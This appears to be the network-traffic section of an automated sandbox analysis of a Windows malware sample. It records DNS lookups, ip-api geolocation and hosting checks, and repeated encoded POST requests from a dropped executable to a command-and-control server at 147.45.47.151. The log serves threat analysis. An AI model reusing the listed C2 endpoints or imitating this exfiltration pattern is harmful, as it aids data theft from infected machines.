                                                                                          Dec 10, 2024 07:30:12.311304092 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:12.366153955 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.548527002 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:12.600543022 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.676018000 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.676281929 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.795603037 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:12.795686960 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.795773029 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:12.795824051 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.796422958 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.915720940 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:13.173727036 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:13.293216944 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:13.293232918 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:13.293504000 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:14.060401917 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:14.116864920 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.292489052 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:14.335118055 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.410873890 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.411132097 CET4996780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.530455112 CET8049967147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:14.530663013 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:14.530742884 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.530755043 CET4996780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.532773972 CET4996780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.652087927 CET8049967147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:14.881912947 CET4996780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.939780951 CET4996980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:15.001420975 CET8049967147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:15.001435995 CET8049967147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:15.001441956 CET8049967147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:15.059330940 CET8049969147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:15.059489012 CET4996980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:15.059662104 CET4996980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:15.179209948 CET8049969147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:15.413217068 CET4996980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:15.532782078 CET8049969147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:15.532798052 CET8049969147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:15.792784929 CET8049967147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:15.834927082 CET4996780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.028598070 CET8049967147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:16.069297075 CET4996780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.148963928 CET4996780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.149199009 CET4997080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.268500090 CET8049970147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:16.268574953 CET4997080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.268691063 CET8049967147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:16.268743992 CET4996780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.272553921 CET4997080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.341362000 CET8049969147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:16.391887903 CET8049970147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:16.397363901 CET4996980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.578779936 CET8049969147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:16.631747007 CET4996980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.632049084 CET4997080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:16.751558065 CET8049970147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:16.751571894 CET8049970147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:16.751578093 CET8049970147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:17.529448032 CET8049970147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:17.584868908 CET4997080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:17.764450073 CET8049970147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:17.819259882 CET4997080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:17.953480959 CET4996980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:17.953583002 CET4997080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:17.953758955 CET4997680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:18.073090076 CET8049976147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:18.073172092 CET4997680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:18.073204041 CET8049969147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:18.073245049 CET4996980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:18.073462963 CET4997680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:18.073679924 CET8049970147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:18.073757887 CET4997080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:18.192715883 CET8049976147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:18.428797960 CET4997680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:18.548172951 CET8049976147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:18.548196077 CET8049976147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:18.548297882 CET8049976147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:19.342299938 CET8049976147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:19.478607893 CET4997680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:19.576662064 CET8049976147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:19.682611942 CET4997680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:19.692472935 CET4998280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:19.694610119 CET4997680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:19.811814070 CET8049982147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:19.811908960 CET4998280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:19.812114954 CET4998280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:19.814274073 CET8049976147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:19.814606905 CET4997680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:19.931418896 CET8049982147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:20.163121939 CET4998280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:20.282704115 CET8049982147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:20.282721043 CET8049982147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:20.282731056 CET8049982147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:21.072921991 CET8049982147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:21.147378922 CET4998280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:21.312171936 CET8049982147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:21.427253008 CET4998280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:21.427253962 CET4998880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:21.546562910 CET8049988147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:21.546751976 CET4998880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:21.546911001 CET8049982147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:21.547116995 CET4998280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:21.550611973 CET4998880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:21.610609055 CET4998980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:21.669886112 CET8049988147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:21.730705976 CET8049989147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:21.730844021 CET4998980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:21.731026888 CET4998980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:21.850266933 CET8049989147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:21.897646904 CET4998880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:22.017146111 CET8049988147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:22.017177105 CET8049988147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:22.017190933 CET8049988147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:22.088767052 CET4998980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:22.208190918 CET8049989147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:22.208231926 CET8049989147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:22.817718983 CET8049988147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:22.944228888 CET4998880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:22.991939068 CET8049989147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:23.059109926 CET8049988147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:23.147346020 CET4998880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:23.178585052 CET4998980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:23.224160910 CET8049989147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:23.381776094 CET4998980192.168.2.8147.45.47.151

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 10, 2024 07:27:43.657532930 CET6247953192.168.2.81.1.1.1
                                                                                          Dec 10, 2024 07:27:43.794605970 CET53624791.1.1.1192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.640265942 CET5947953192.168.2.81.1.1.1
                                                                                          Dec 10, 2024 07:27:47.637411118 CET5947953192.168.2.81.1.1.1
                                                                                          Dec 10, 2024 07:27:48.378071070 CET53594791.1.1.1192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.378078938 CET53594791.1.1.1192.168.2.8
                                                                                          Dec 10, 2024 07:28:09.857177973 CET5071653192.168.2.81.1.1.1
                                                                                          Dec 10, 2024 07:28:09.993597984 CET53507161.1.1.1192.168.2.8

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 10, 2024 07:27:43.657532930 CET192.168.2.81.1.1.10x3728Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                          Dec 10, 2024 07:27:46.640265942 CET192.168.2.81.1.1.10xd6a4Standard query (0)dragonhack.shopA (IP address)IN (0x0001)false
                                                                                          Dec 10, 2024 07:27:47.637411118 CET192.168.2.81.1.1.10xd6a4Standard query (0)dragonhack.shopA (IP address)IN (0x0001)false
                                                                                          Dec 10, 2024 07:28:09.857177973 CET192.168.2.81.1.1.10xd369Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 10, 2024 07:27:43.794605970 CET1.1.1.1192.168.2.80x3728No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                          Dec 10, 2024 07:27:48.378071070 CET1.1.1.1192.168.2.80xd6a4No error (0)dragonhack.shop91.149.219.45A (IP address)IN (0x0001)false
                                                                                          Dec 10, 2024 07:27:48.378078938 CET1.1.1.1192.168.2.80xd6a4No error (0)dragonhack.shop91.149.219.45A (IP address)IN (0x0001)false
                                                                                          Dec 10, 2024 07:28:09.993597984 CET1.1.1.1192.168.2.80xd369No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • dragonhack.shop
                                                                                          • ip-api.com
                                                                                          • 147.45.47.151

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.849704208.95.112.1807520C:\Users\user\Desktop\Wh2c6sgwRo.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:27:43.938498974 CET97OUTGET /json/ HTTP/1.1
                                                                                          Content-Type: application/json
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:27:45.080363035 CET483INHTTP/1.1 200 OK
                                                                                          Date: Tue, 10 Dec 2024 06:27:44 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 306
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 60
                                                                                          X-Rl: 44
                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                                          Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.228"}


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.849707208.95.112.1807768C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:27:52.956732035 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:27:54.123486042 CET175INHTTP/1.1 200 OK
                                                                                          Date: Tue, 10 Dec 2024 06:27:53 GMT
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Content-Length: 6
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 60
                                                                                          X-Rl: 44
                                                                                          Data Raw: 66 61 6c 73 65 0a
                                                                                          Data Ascii: false


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.849711208.95.112.1801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:10.165043116 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:11.267781973 CET175INHTTP/1.1 200 OK
                                                                                          Date: Tue, 10 Dec 2024 06:28:10 GMT
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Content-Length: 6
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 60
                                                                                          X-Rl: 44
                                                                                          Data Raw: 66 61 6c 73 65 0a
                                                                                          Data Ascii: false


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.849713147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:12.698286057 CET343OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 344
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:13.058620930 CET344OUTData Raw: 00 03 01 01 06 0b 04 01 05 06 02 01 02 03 01 05 00 02 05 0d 02 04 03 0a 01 04 0e 06 03 05 03 50 0c 03 06 01 01 0d 03 02 0b 05 07 03 05 06 02 00 04 50 0b 0f 0e 0f 01 07 05 04 04 56 07 07 06 09 00 0b 0e 0a 00 0f 01 02 0e 0e 0d 00 0f 03 0e 02 05 01
                                                                                          Data Ascii: PPVWW\L~|p[[`bT_aexhBav|pMh]wYlllXzpq^hmQU`I|iO~V@{Sr}ry
                                                                                          Dec 10, 2024 07:28:13.959307909 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:13.983135939 CET1236INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 35 37 34 0d 0a 56 4a 7e 4c 6f 53 59 01 78 72 52 00 7c 5f 5a 58 6a 01 6c 55 68 06 66 53 7b 73 60 4c 7e 04 64 48 74 5d 6a 55 6d 5f 79 4b 75 76 5a 07 7c 61 78 01 55 4b 72 53 63 5b 60 58 68 61 6a 5d 7f 59 7a 0b 79 75 6c 08 7e 5d 70 5a 75 72 7e 5e 74 62 6e 5a 68 07 79 5d 6a 55 78 08 69 49 68 58 76 66 7b 06 7c 5c 75 47 7c 70 5f 01 79 74 77 59 7b 67 7c 04 7b 6d 59 46 78 61 7b 5d 78 63 6e 4e 68 5e 68 07 6c 77 60 00 7d 5c 67 04 61 62 67 58 7a 51 41 5b 68 74 68 41 7f 07 79 40 75 0a 77 5a 6f 52 56 05 60 60 7e 08 6d 07 7d 00 6a 6c 5b 5e 7a 62 7a 02 75 73 55 4a 75 61 63 5e 60 4f 66 50 7e 5d 79 5f 77 62 6e 5c 76 65 68 09 7f 52 65 07 77 7c 7c 04 68 5d 6f 5b 78 6f 7c 5a 6c 06 76 03 7c 6e 7c 08 74 74 7c 04 69 62 61 50 7e 53 7f 4f 7a 7e 62 06 6a 5b 79 07 7b 5d 46 51 68 7f 60 41 6a 70 74 4f 69 74 7e 01 6c 0b 60 5a 79 61 7c 05 7c 4f 5e 5a 7d 59 7b 0d 7c 73 75 0b 6e 60 77 5d 7f 72 67 59 74 63 7d 51 7b 5c 79 4b 76 66 64 01 7c 76 60 07 7e 66 6d 40 76 72 6b 44 7f 72 71 4d 7c 67 6a 0d 79 76 74 41 7e 4d 63 00 76 62 53 03 74 [TRUNCATED]
                                                                                          Data Ascii: 574VJ~LoSYxrR|_ZXjlUhfS{s`L~dHt]jUm_yKuvZ|axUKrSc[`Xhaj]Yzyul~]pZur~^tbnZhy]jUxiIhXvf{|\uG|p_ytwY{g|{mYFxa{]xcnNh^hlw`}\gabgXzQA[hthAy@uwZoRV``~m}jl[^zbzusUJuac^`OfP~]y_wbn\vehRew||h]o[xo|Zlv|n|tt|ibaP~SOz~bj[y{]FQh`AjptOit~l`Zya||O^Z}Y{|sun`w]rgYtc}Q{\yKvfd|v`~fm@vrkDrqM|gjyvtA~McvbStOyqPH|p@gwIwqY{b[}NS{Yl{wRymUKz\RzszNNhxgpD}Lsua|~||gtqyAwl`{||tNv{aqJ}ljNzqrwsUIv_tt_f@|pTvruweZB[OwB|MZDy|QHz`fJChtI`A}Ln@}}wx}~L}r[N|`Z|R|N~N|}IvCz}syrt|awI~w{|Nuy]Rb|wcSy_WwvRE}vt}XaAw\YKLW}gPxvRA~]kHwraAt_a|afKl|N~wsJu_{{bu~^[JxYlygZy}kIyrl{]P{]NZytpJ~a|\u_|~|ZXkgxhbqAu|R{lgY`NTAnquIilb_z\y\}b`g{ZL~JxYzw\yuetA|lWwB{^]t{os{pTkC]R`I\ib\zSYQfWyejnvhlQSQgf{}BldIU{AkJEjddlklznos`jn{mpRmbGZtqxi_w_~fzRtrk|}BhYzlu|jZIbq}Lvqj[OaY}k|UJx]bbGW~n^RcUU^oLRdoORz{~\RD{snC`pIzY|J|uDqXQ\QtAVdUHPYSY`k|R^XmYa}sXFPU@_yvy_b`DZ}cXXb_RYeYXa@q[VQeUfp~UCRZJZz{|\ocDPqoWXdPS[aVRnMd [TRUNCATED]
                                                                                          Dec 10, 2024 07:28:13.983175039 CET358INData Raw: 63 65 51 7b 5e 73 7a 6a 6e 56 56 6e 60 09 41 55 4c 79 40 71 5f 55 5e 51 01 73 44 54 65 5c 48 5b 5a 0b 59 50 05 66 40 56 7b 79 0c 67 00 00 53 69 64 7b 06 71 5a 6e 62 70 5c 4f 59 6b 07 65 47 53 7f 4d 08 6a 01 5e 46 60 07 7c 46 51 61 0d 00 50 5a 54
                                                                                          Data Ascii: ceQ{^szjnVVn`AULy@q_U^QsDTe\H[ZYPf@V{ygSid{qZnbp\OYkeGSMj^F`|FQaPZT|odXYV\`nASqcZ|qyklk_UJ|@z[R[ZwCWoRBP_RPYoZWVcu[eU}_[YgSv_yvy_b`DZ}cXXb_hB]qT@bfeUvAckpx\EUVd]|quGhasI`|_|u}VinOWqaXQaQPswS`kjsdQ|Z~xz
                                                                                          Dec 10, 2024 07:28:14.045324087 CET319OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 384
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:14.426491976 CET384OUTData Raw: 57 5f 5f 52 5b 5c 50 59 58 57 5a 57 52 57 51 54 5b 5b 5d 42 57 56 50 5a 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__R[\PYXWZWRWQT[[]BWVPZ^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"'/0Z :"59=.0,(%*8W!-%Y?8)]&#;\-.\%!Z+,
                                                                                          Dec 10, 2024 07:28:14.447038889 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:14.833616018 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 03 23 07 05 11 32 1d 0d 0a 2e 21 2f 57 32 3d 02 1a 29 0c 21 00 26 06 2b 5c 2c 31 27 1f 3d 2d 0b 10 2b 14 20 52 3d 2f 0d 1e 27 25 21 46 0c 1d 27 04 24 02 32 5f 24 3d 3b 5c 30 11 23 58 27 21 23 15 29 55 38 51 20 33 27 5e 27 23 09 09 2d 2d 25 0c 2e 26 2e 40 29 54 3d 0d 25 12 22 57 0d 12 27 51 31 09 29 1c 34 31 39 09 22 0f 2c 1f 28 43 20 5c 24 2e 0d 11 35 04 26 01 30 31 27 00 34 34 28 58 28 3b 08 59 31 2e 3a 50 30 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98&#2.!/W2=)!&+\,1'=-+ R=/'%!F'$2_$=;\0#X'!#)U8Q 3'^'#--%.&.@)T=%"W'Q1)419",(C \$.5&01'44(X(;Y1.:P0 ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.849714147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:14.339091063 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:14.908617020 CET2512OUTData Raw: 57 51 5a 5a 5e 59 55 5f 58 57 5a 57 52 52 51 51 5b 5a 5d 46 57 5f 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WQZZ^YU_XWZWRRQQ[Z]FW_PU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!& ]##&"*.^0<8\3 5.=Z?8P>6 1?..\%!Z+
                                                                                          Dec 10, 2024 07:28:15.574578047 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:15.809057951 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.849715147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:15.465962887 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1564
